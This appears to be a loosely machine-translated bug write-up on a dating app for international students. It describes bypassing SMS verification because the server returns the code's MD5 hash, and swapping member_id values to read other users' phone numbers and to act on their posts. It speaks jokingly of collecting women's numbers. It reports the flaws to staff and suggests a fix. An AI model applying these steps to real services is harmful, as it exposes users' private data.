Better's hottest package of Privilege Escalation Vulnerability in the dating community for international students involved the leakage of million user data

Better's hottest package of Privilege Escalation Vulnerability in the dating community for international students involved the leakage of million user data

Register an account first. Click "register by phone ".

Enter your mobile phone number to receive the verification code 13012345678.

Sure! Then, capture the packet and check what the server returns.

What is the MD5 value of identifying_code? Unlock it.

Eh? It seems like a verification! Certificate! Code! Sure enough, the verification is passed. Let's start the next step.

Let's take a look at what is entered in other people's documents. After registration, a friend should be an official O & M engineer.

I saw Beibei's mobile phone number. Here I only need to review all the member IDs to get the mobile phone numbers of many sisters \ (^ o ^) /modify the member_id in the post object if the topic is out of authorization. Although there is a token, it is not verified at all.

Unauthorized attention is also changed to member_id as the Peer's

There are also a variety of questions in the APP, such as unauthorized reply, excessive permission deletion, excessive permission, etc. In the APP, I contacted the official staff who mentioned the above, Beibei, very cute, and gave feedback on the above issues.

Solution:

Token should not only verify login_member_id